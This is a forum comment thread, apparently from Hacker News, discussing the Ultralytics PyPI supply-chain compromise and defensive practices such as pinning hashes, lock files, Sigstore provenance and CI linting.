Analysis of supply-chain attack on Ultralytics

dlor · a year ago

Really cool to see all the hard work on Trusted Publishing and Sigstore pay off here. As a reminder, these tools were never meant to prevent attacks like this, only to make them easier to detect, harder to hide, and easier to recover from.

theteapot · a year ago

Just getting around to looking at this. There is a certificate in sigstore for the 8.3.41 that claims the package is a build of cb260c243ffa3e0cc84820095cd88be2f5db86ca -- https://search.sigstore.dev/?logIndex=153415340. But it isn't. The package content differ from the content of that commit. This doesn't seem like something that's working that well.

ronjouch · a year ago

Good recommendations, including a neat tool to audit your GHAs: https://github.com/woodruffw/zizmor , “A static analysis tool for GitHub Actions”.

clbrmbr · a year ago

As a user of PyPI, what’s a best practice to protect against compromised libraries?

I fear that freezing the version number is inadequate because attackers (who don’t forget, control the dependency) could change the git tag and redeploy a commonly used version with different code.

Is it really viable to use hashes to lock the requirements.txt?

woodruffw · a year ago

Release files on PyPI are immutable: an attacker can’t overwrite a pre-existing file for a version. So if you pin to an exact version, you are (in principle) protected from downloading a new malicious one.

The main caveat to the above is that files are immutable on PyPI, but releases are not. So an attacker can’t overwrite an existing file (or delete and replace one), but they can always add a more specific distribution to a release if one doesn’t already exist. In practice, this means that a release that doesn’t have an arm64 wheel (for example) could have one uploaded to it.

TL;DR: pinning to a version is suitable for most settings; pinning to the exact set of hashes for that version’s file will prevent new files from being added to that version without you knowing.

TZubiri · a year ago

The best practice is to reduce your dependencies.

Trim your requirements.txt

HeatrayEnjoyer · a year ago

Your software should execute as little code written outside your offices as possible.

pabs3 · a year ago

Download the libraries' real source repos, apply static analysis tools, audit the source code manually, then build wheels from source instead of using prebuilt stuff from PyPI. Repeat for every update of every library. Publish your audits using crev, so others can benefit from them. Push the Python community to think about Reproducible Builds and Bootstrappable Builds.

https://github.com/crev-dev/https://reproducible-builds.org/https://bootstrappable.org/

thangngoc89 · a year ago

This is where tools like poetry, uv with lock files shine. The lock files contains all transient dependencies (like pip freeze) but they do it automatically.

d0mine · a year ago

Are you sure pypi allows to modify old published package?

Lock files may contain hashes.

koromak · a year ago

Anyone know of a tool like zizmor for GitLab CI/CD? Pretty confident my setup is unsafe after reading through this.

Honestly safety in CI/CD seems near impossible anyways.

pabs3 · a year ago

There is some linting available:

https://docs.gitlab.com/ee/ci/yaml/lint.html

Personally I'd move as much logic out of the YAML as possible into either pure shell scripts or scripts in other languages. Then use shellcheck other appropriate linters for those scripts.

Maybe one day someone will write a proper linter for the shell-wrapped-in-yaml insanity that are these CI systems, but it seems unlikely.

romanows · a year ago

So the Python package `ultralytics` had their GitHub CI/CD pipeline compromised which allowed an attack to be inserted and then published on PyPI?

thangngoc89 · a year ago

Attacker sent a PR to the ultralytics repository that triggered Github CI. This results in 1) attacker trigger new version publication on the CI itself 2) attacker was able to obtain secrets token for publish to PyPi

Hilift · a year ago

Sadly, popular open source projects are vulnerable to this vector. A popular package that is adopted by a large vendor (Redhat/Microsoft) may see a PR from months or a year ago materialize in their product update pipeline. That is too easy to weaponize so that it doesn't manifest until needed or in a different environment.

amelius · a year ago

Question. Are there white-hat hackers out there who pen-test the Python ecosystem on a regular basis?

ashishbijlani · a year ago

We scan PyPI packages regularly for malware to provide a private registry of vetted packages.

The tech is open-sourced: Packj [1]. It uses static+dynamic code/behavioral analysis to scan for indicators of compromise (e.g., spawning of shell, use of SSH keys, network communication, use of decode+eval, etc). It also checks for several metadata attributes to detect impersonating packages (typo squatting).

1. https://github.com/ossillate-inc/packj

amelius · a year ago

If the tech is open-sourced, then an attacker can keep trying in private until they find an exploit, and then use it.

Also, you only know if your security measures work if you test them. I'd feel much safer if there was regular pen-testing by security researchers. We're talking about potential threats from nation state actors here.

orf · a year ago

I maintain a project that mirrors all the code published to PyPi into a series of GitHub repositories, allowing automated scanning and analysis.

https://github.com/pypi-data

zvr · a year ago

Thank you for that! It's been very useful!

Dead Comment